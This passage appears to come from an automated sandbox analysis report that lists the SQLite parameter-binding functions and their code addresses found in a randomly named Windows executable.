Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D65B sqlite3_bind_null, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D635 sqlite3_bind_int, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D9B0 sqlite3_bind_value, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D981 sqlite3_bind_text16, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D945 sqlite3_bind_text64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D916 sqlite3_bind_text, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D8E7 sqlite3_bind_blob64, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E038CA sqlite3_bind_parameter_count, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E158CA sqlite3_bind_parameter_index, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E038DC sqlite3_bind_parameter_name, |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Code function: 0_2_61E2D8B8 sqlite3_bind_blob, |